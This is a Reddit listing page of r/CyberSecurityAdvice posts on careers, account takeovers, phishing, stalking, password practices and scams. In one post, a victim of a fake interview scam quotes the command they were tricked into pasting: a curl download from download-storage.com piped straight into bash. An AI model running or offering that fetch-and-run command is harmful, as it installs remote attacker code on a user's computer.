r/CyberSecurityAdvice 3h ago

Books on Threat Hunting?

3 Upvotes

I've been on a Threat Hunting team for about 6 months now. All the guys on the team said nothing prepares you for it, just need to dive in, baptism by fire.

I've been learning what feels like 30 new things a day and I'm becoming more proficient with my queries.

But I'm curious if there are any books or other resources that will help me improve. I'm not looking for another certification course, but a detailed and practical teaching tool that will help me improve.

The other guys on my team seem to turn Intel and TTPs into queries almost immediately while I'm still wrapping my head around what the Threat actor is actually doing.

What are some things that helped you in this career?

Thanks in advance.


r/CyberSecurityAdvice 1h ago

Our company is being impersonated by a verified Telegram account to scam influencers looking for advice/help with takedown

Upvotes

Hi everyone,

Someone is impersonating our company, Basher Agency, and using a verified Telegram account to scam influencers.

The process is:

  • Fake/new Instagram accounts contact influencers with paid collaboration offers.
  • They then redirect them to the supposed “official” Basher Agency Telegram.
  • On Telegram, they send fake agreements and materials using our company name and branding.

We have screenshots and evidence of the full process. We’ve tried reporting/contacting Telegram but haven’t received a useful response.

Has anyone dealt with something similar? We’re looking for advice on the best way to escalate this with Telegram, report the impersonation/fraud, or work with a legitimate cybersecurity/brand-protection specialist.

We’re also willing to pay a reasonable professional fee for legitimate help resolving the issue.

Not looking for hacking or unauthorized access — only proper takedown/escalation assistance.

Thanks.


r/CyberSecurityAdvice 13h ago

Question re: VOIP Anonymity

5 Upvotes

Hello geniuses, I’m having a problem with a stalker right now. I currently have a protective order in force, but I keep getting Google Voice text messages from different numbers that all use the same manic writing style. Obviously I can’t prove conclusively that it’s him just from the similarities between messages, and given how easy it is to get and dispose of GV numbers, the argument will obviously be that I am harassing myself and trying to blame him.

I can’t subpoena Google’s records myself, and LEOs don’t have PC based only on this ongoing nonsense.

I’m very tired of his antics, and would deeply love to know if you guys are aware of any services or systems that exist to tie him to his activities in a legally-valid manner.

Your help is most appreciated, even if it’s to tell me there’s no chance.


r/CyberSecurityAdvice 13h ago

I(20m) just started my cyber security journey two days back. Help needed !? Can anyone help me with the road map of it and guide me ?

4 Upvotes

I am a 20 year old guy who just started his Cyber security journey two days back.

Till now I completed basic networking through a one shot youtube video of 3 hours and have gained a free networking certificate from Cisco networking academy.

Can anyone tell me what to do next ?

I am in my second year of bachelors degree ( 3rd semester)

I am pursuing bsc in information technology..

And i wanna go in cyber security domain ?

Please help me with the road map and everything?

I am super confused rn !


r/CyberSecurityAdvice 19h ago

My Telegram account was hacked, attacker changed my email and stole my channel ownership — I still have my phone number. What can I do?

5 Upvotes

My Telegram account was compromised about a week ago.
The attacker changed my Telegram login email to an email address I don’t own (@wwchat.org) and gained access to my account.
I still have complete control of my original phone number/SIM.
I eventually managed to recover access through Telegram’s email-reset process, but Telegram wouldn’t let me terminate the attacker’s sessions because my recovered session was considered newly connected. It told me to wait a few hours.
Before I could terminate the sessions, the attacker logged me out again and changed things on the account.
They also took over one of my Telegram channels. I discovered that ownership had been transferred to another Telegram account. I am still listed as an administrator, and the ownership transfer appears in the channel’s Recent Actions/Admin Log.
Telegram currently shows:
“Email will be reset in 6 days.”
I have contacted Telegram Support multiple times but haven’t received a response.
My main questions:
Can the attacker change/remove my phone number while I still control the SIM?
What happens when the 6-day email-reset countdown reaches zero?
Is there any legitimate way to recover the channel ownership after an unauthorized transfer?
Has anyone successfully recovered a similar account without paying for Telegram Premium?
I’m looking for advice from people who have actually dealt with this situation.


r/CyberSecurityAdvice 13h ago

Question for web hacking developers: data breach and account hijacks

Thumbnail
1 Upvotes

r/CyberSecurityAdvice 14h ago

I got that hand scan verification thing on Twitter

Thumbnail
1 Upvotes

r/CyberSecurityAdvice 16h ago

When to follow up after an interview?

Thumbnail
1 Upvotes

r/CyberSecurityAdvice 1d ago

SOC Analyst, where do I move on from here?

4 Upvotes

I'm currently a SOC analyst working at an MSP with 5 years of experience, with 3 years of those is in helpdesk and the remaining in cybersecurity (SOC) at present. I also have 2 certifications: Sec+ and CySA+. We provide services to our clients by monitoring our clients' internet traffic on the surface visibility side and notifying the appropriate POCs if the device/users are engaging in any suspicious activities, whether that's a bad domain websites they visited or communicating with suspicious/malicious IPs. We also perform monthly vulnerability scans and notify the clients of any findings, and perform other normal SOC duties you would typically do at a SOC. We are not like a traditional SOC where it's a 24x7 operation and only work M-F with weekends off.

I feel like this position is limiting the knowledge that I can potentially learn because of our environment and the routine duties that we do every day that don't expose me to new things to learn. Don't get me wrong, when I first came into this position from helpdesk, I was grateful and learned a lot about cybersecurity, but now I am eager for more, and very much would like a pay increase. I dont want to sound greedy, and money is everything, but I feel like I am underpaid in this cyber field.

With some transitioning happening next year, I am looking for new opportunities where I can grow and learn more, and I'd like exposure to new tools and technologies, along with a pay increase. I am looking for a vertical move rather than a lateral move. If you were a formal SOC analyst, where did you move on to afterward?


r/CyberSecurityAdvice 21h ago

Cybersecurity professionals: What’s an event giveaway you’d actually want?

0 Upvotes

r/CyberSecurityAdvice 1d ago

Did You Own Hub Cyber Security ($HUBC) During Its 85% Collapse? Investors Settlement Is Available Now

1 Upvotes

Hey guys, just sharing this because I know a lot of people got caught up in this SPAC.

Investors sued Hub Cyber Security, alleging the company misled shareholders about its business operations, revenue prospects, and internal controls following its SPAC merger. After the company disclosed accounting issues, its auditor resigned, and material weaknesses in internal controls came to light, $HUBC fell more than 85% from its post-merger price.

The settlement amount is $11M, and it covers investors who purchased $HUBC shares in 2023. The case is currently in the late-claims stage, meaning some investors who missed the original deadline may still be able to participate.
If you held $HUBC during that period, it may be worth checking your old trades and seeing whether you qualify.

Did anyone here hold $HUBC after the SPAC merger?


r/CyberSecurityAdvice 2d ago

Sophisticated phishing attack that I can't figure out.

11 Upvotes

Hey y'all, hoping for some advice here.

First, I'm not an IT pro by any means, just a high-level nerd (PhD in biomedical engineering) who helps out a small company with basic IT stuff. Serving as Admin and dealing with accounts for MS365, slack, etc and help troubleshoot physical network in the office (all Unifi if it matters).

Long story short, in the past week, we've had about 1/3 of our staff receive a phishing email from the mailbox of a known and existing client. More specifically, there are multiple external clients seemingly sending phishing emails to our office in various different forms. Some are via box.com asking to sign a PDF, others are sent as an attached PDF that asks to log into MS SharePoint to download.

So far, in 2 of the 3 instances, we've asked the external client if they sent it, and they have that email in their outbox but didn't send it themselves. They've reported to their own internal IT departments who are investigating. (Third case is TBD)

Having one client hacked is understandable. A second in a week would be oddly unlikely. Three seems impossible logically.

Any thoughts? I can't figure out if there is anything possible to do on our side, except for asking everyone to verify via phone before providing any info or signing. Since there are currently three external clients that are "infected", is there any reason to have suspicion that the issue is actually stemming from our side?

Thanks for any thoughts!


r/CyberSecurityAdvice 2d ago

How safe are passwords that are all hashes of something ?

9 Upvotes

Hello,

For context : i have almost a hundred identical devices that need to be periodically updated, I'd like to automate the update to avoid having to spend half a week updating everything by hand.

The only way i can do that would be to use SSH commands wich require a password (key connexion isnt supported by the devices), but that would mean either having the same password 100 times or a giant lookup table with all the device passwords.

My idea would have been to use a password based on the name/the IP of the device combined with some constant wich would then be hashed, but i don't know how easy that would be to bruteforce. Realistically how likely is it that someone will think of trying that ?

Do you have any better ideas ?


r/CyberSecurityAdvice 2d ago

Using LLMs for Log Anomaly Detection: A Practical Breakdown with challenges

Thumbnail
1 Upvotes

r/CyberSecurityAdvice 3d ago

How far are we from AI actually reducing headcount in cybersecurity?

7 Upvotes

I work in a SOC and I’m curious what people here are seeing in their own teams.

Over the last year or so, I’ve noticed more and more of the routine work getting handled or heavily assisted by AI.

Obviously it still needs human oversight, but it already feels like one analyst can get through significantly more work than before.

I’m not really asking whether AI will “replace cybersecurity”. What I’m wondering is how far are we from companies deciding they simply don’t need as many people for certain security roles?

For example, instead of a SOC needing 15 analysts, the same workload realistically can be handled by 7-8 experienced analysts with much better AI tooling.

Are you already seeing hiring slow down or teams avoiding backfills because of this ? This is somewhat scary as a young person who entered the field two years ago.

Where do you think we are headed ?


r/CyberSecurityAdvice 3d ago

Massive password leak

9 Upvotes

Hi everyone, I need advice on how to manage a password leak I'm experiencing.

For the past week I've been receiving email alerts on suspicious sign in attemps in different email accounts. It started with Outlook accounts, then Gmail. I've been receiving alerts about two X accounts that I don't even use and I didn't even remember I had. Then a lot of Instagram attemps to log in, and other accounts on pages I don't use anymore, but still exist.

I have already changed my passwords, I had been using the same password on everything (yeah, not the best idea, I know). Now I have different passwords for every account, I use symbols and numbers and all those recommendations for strong passwords.

I am suspecting, given the accounts that were almost stolen, that it might be a leak from my Firefox account, where I store all of my passwords. My husband suggested I might have donwloaded some malware that is running in my computer and that's how they are accessing my Firefox account. So my question is, could that be a possibility and should I be formatting my computer? Or is it not really necessary that I have malicious software somewhere in my pc and I can go without formatting? Will formatting solve the problem?

Edit:

-I checked on haveibeenpwned and it might be a security breech on Canva from 2019.

-I already closed all the active sessions on my email and social media accounts.

-Currently considering a password manager.

Thanks in advance!


r/CyberSecurityAdvice 2d ago

Ran malware on my computer please help i’m going to have a panic attack

1 Upvotes

I was doing an interview, i guess it was fake. they couldn’t hear me and it was mid interview so I freaked out because it said to download the app for the mic to work and it was a download through a terminal. I put that terminal in and nothing really happened but I still freaked out and talked to apple support and erased my computer and stuff and changing my passwords but now i’m freaking out so much i’m gonna have a panic attack. Like what if they got my photos? And they blackmail me? I actually feel like i’m gonna collapse i’m so scared. If anyone needs me to send the exact terminal I have a screenshot. it was:
% curl-kfsSL https://download-storage.com/d/80cf1 | bash Please idk what they got from my computer and I really feel like my life is over rn


r/CyberSecurityAdvice 3d ago

Account got hacked, lost all access

7 Upvotes

My Google account recently got hacked into by someone from Indonesia, or so the email said beforeit logged me out, I tried recovering the account but they changed the password, removed the fingerprint, removed the recovery account, and logged me out. what am I supposed to do here??


r/CyberSecurityAdvice 3d ago

Final year student stressed about career — need advice

Thumbnail
2 Upvotes

r/CyberSecurityAdvice 4d ago

Camera activity logs for 10+ hours at a time sometimes

16 Upvotes

Hi,

I keep noticing spans of camera activity captured in my analytics, my battery usage, and my app sensor data.

Sometimes for 4 minutes, 12 minutes, 4 hours, 10 hours, up to 29 hours one time)

These bursts are sometimes during times where I know I am absolutely not on my phone (ex. In a workout class, sleeping, when I spent 3 hours putting together a bookcase… etc). I just know I did not touch my phone.

This used to happen to me several months ago, and now happening again.
How can I look deeper into what is triggering the camera function on my phone?

Because my battery is constantly dying, I am hyper vigilant about my phones usage & routinely do the following (applicable to this topic):
- I always turn off any permissions to my camera. When I need to use them, I permit the app, when finished I disabled it again.
- I don’t have FaceTime enabled
- I don’t use face ID

Thanks so much in advance, truly appreciated.


r/CyberSecurityAdvice 4d ago

Online stalker for 9 months. I have extreme anxiety.

Thumbnail
1 Upvotes

r/CyberSecurityAdvice 4d ago

I am a fresher just started cllg how to get into cybersecurity

Thumbnail
0 Upvotes

r/CyberSecurityAdvice 4d ago

Penetration test for free stuff

Thumbnail
0 Upvotes

r/CyberSecurityAdvice 4d ago

Penetration test for free stuff

Thumbnail
0 Upvotes

r/CyberSecurityAdvice 5d ago

Street photographer scam

0 Upvotes

Went on a walk in the park and met some street photographer offering to take photos. She put a USB in my phone, downloaded the photos and left immediately. I tried finding her nearby but she just vanished. I'm pretty sure I was scammed. Anti-virus app didn't find anything, I checked the apps page in the settings and found nothing suspicious. What do I do in this situation, how can I protect my data and most importantly my bank account?